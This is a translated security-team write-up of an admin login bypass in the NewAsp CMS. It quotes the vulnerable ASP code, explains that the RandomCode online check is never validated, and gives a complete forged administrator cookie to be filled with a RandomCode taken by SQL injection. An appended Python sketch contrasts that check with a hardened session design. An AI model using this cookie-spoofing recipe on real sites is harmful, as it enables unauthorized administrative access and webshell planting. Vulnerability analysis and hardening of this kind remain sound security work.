Source: Red Wolf Security Team (www.wolfexp.net)
Author: 阿呆

Recently, while playing with NewAsp (新云), I often found during cookie spoofing that an administrator was already online. The system does not allow several users to be logged in at the same time, so I could not get into the backend or get a webshell, which was very frustrating. I downloaded the NewAsp source and took a look. In admin_login.asp I found a small problem; let's look at it together (my ASP barely counts as beginner level, so this is only a simple analysis; if I get something wrong, please don't throw tomatoes at me):

Sub logout()
' Clear the administrator identity verification information from the cookies.
Session.Abandon
Session("AdminName") = ""
Session("AdminPass") = ""
Session("AdminGrade") = ""
Session("AdminFlag") = ""
Session("AdminStatus") = ""
Session("AdminID") = ""
Session("AdminRandomCode") = ""
Response.Cookies(Admin_Cookies_Name) = ""
Response.Redirect ("../")
End Sub

Here we can see that when we submit the cookie, the main parameters are AdminName, AdminPass, AdminGrade, AdminFlag, AdminStatus, AdminID and AdminRandomCode. RandomCode is the random code, that is, the parameter used at login to check whether an administrator is online.

Sub chklogin()
' Several lines of this routine were lost when the page was extracted: "..." marks the gaps,
' and the "<" characters stripped from HTML tags and "<>" operators have been restored.
Dim adminname, password, RandomCode
adminname = Trim(Replace(Request("adminname"), "'", ""))
password = md5(Trim(Replace(Request("password"), "'", "")))
If Newasp.CheckPost = False Then
ErrMsg = ErrMsg + "您提交的数据不合法,请不要从外部提交登陆。"
Founderr = True
End If
If Newasp.IsValidStr(Request("adminname")) = False Then
ErrMsg = ErrMsg + "</li>"
Founderr = True
End If
If Newasp.IsValidPassword(Request("password")) = False Then
ErrMsg = ErrMsg + "</li>"
Founderr = True
End If
If Request("verifycode") = "" Then
ErrMsg = ErrMsg + "<li>请返回输入确认码。<br>" + "</li>"
Founderr = True
ElseIf CStr(Session("getcode")) <> CStr(Request("verifycode")) Then
ErrMsg = ErrMsg + "<br>" + "</li>"
Founderr = True
End If
Session("getcode") = ""
If adminname = "" Or password = "" Then
Founderr = True
ErrMsg = ErrMsg + "<li>请输入您的用户名或密码。"
...
ErrMsg = ErrMsg + "<li>您输入的用户名和密码不正确或者您不是系统管理员。!"
...
If password <> Rs("password") Then
FoundErr = True
ErrMsg = ErrMsg + "<li>用户名或密码错误!!!"
...
If Rs("isLock") <> 0 Or Rs("isLock") = "" Then
Founderr = True
ErrMsg = "</li>"
Exit Sub
End If
End If

Three variables are defined here: adminname, password and RandomCode. As you can see, from the start of the routine to its end, the RandomCode variable is never checked.

Next we see:

RandomCode = Newasp.GetRandomCode
Rs("LoginTime") = Now()
Rs("Loginip") = Newasp.GetUserip

As you can see, the RandomCode variable is assigned directly from the database. In other words, RandomCode is stored in the database, and the program performs no check at all on this variable (the random code).

Practical use:

When we are doing injection guessing, while guessing the username, password and id fields we can also guess a RandomCode field, then find RandomCode in the cookie we submit and replace the original value with the one we guessed.

Example:

ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77&RandomCode=(put the RandomCode value here)&AdminName=admin

This way, when the cookie is submitted, we can log into the backend directly regardless of whether an administrator is online.

PS: The analysis in this article is not very professional. Experienced people may already have found this vulnerability and simply not published it, or published it and I did not see it. In any case, I am sharing it in the spirit of learning...
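To make the defensive point concrete, here is the weak pattern described above (identity fields and RandomCode read from the cookie, RandomCode never compared with anything the server holds) beside a hardened version in which the cookie carries only an opaque session id and the per-login random code lives in the server session. This is an added illustration, not NewAsp's code; the in-memory stores, the cookie parser, the function names and the forged cookie are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, unquote

# Constructed stand-ins for the NewAsp admin table and the ASP Session object (not NewAsp's own code).
ADMINS = {"admin": {"password_md5": hashlib.md5(b"example-pass").hexdigest(), "grade": 999}}
SESSIONS = {}  # server-side session id -> {"AdminName", "AdminRandomCode"}
ONLINE = {}    # AdminName -> RandomCode of the session that currently holds the admin seat

def parse_admin_cookie(cookie):
    """Split the admin%5Fnewasp value (AdminName=..&AdminPass=..&RandomCode=..) into a dict."""
    for part in cookie.split("; "):
        name, _, value = part.partition("=")
        if unquote(name) == "admin_newasp":
            return dict(parse_qsl(value, keep_blank_values=True))
    return {}

def vulnerable_is_admin(cookie):
    """The pattern the article describes: identity is trusted from the cookie and RandomCode
    is never compared with anything the server holds, so a copied value is accepted."""
    c = parse_admin_cookie(cookie)
    admin = ADMINS.get(c.get("AdminName"))
    return admin is not None and c.get("AdminPass") == admin["password_md5"]

def login(name, password):
    """Hardened login: the cookie carries only an opaque session id; the random code stays server-side."""
    admin = ADMINS.get(name)
    digest = hashlib.md5(password.encode()).hexdigest()
    if admin is None or not hmac.compare_digest(digest, admin["password_md5"]):
        return None
    code, sid = secrets.token_urlsafe(16), secrets.token_urlsafe(24)  # fresh and unguessable per login
    SESSIONS[sid] = {"AdminName": name, "AdminRandomCode": code}
    ONLINE[name] = code  # this login now holds the seat; any earlier session's code no longer matches
    return f"sid={sid}"

def hardened_is_admin(cookie):
    """Identity comes from the server session, whose code must still match the live seat."""
    for part in cookie.split("; "):
        name, _, sid = part.partition("=")
        if name == "sid" and sid in SESSIONS:
            s = SESSIONS[sid]
            return hmac.compare_digest(s["AdminRandomCode"], ONLINE.get(s["AdminName"], ""))
    return False

# Constructed forged cookie in the page's format, with a RandomCode "recovered" from the database.
FORGED_COOKIE = ("admin%5Fnewasp=AdminStatus=x&AdminID=1&AdminGrade=999&AdminPass="
                 + ADMINS["admin"]["password_md5"] + "&RandomCode=recovered&AdminName=admin")
```

The forged cookie satisfies vulnerable_is_admin but not hardened_is_admin, because the hardened check derives identity from server state that a database read cannot reproduce.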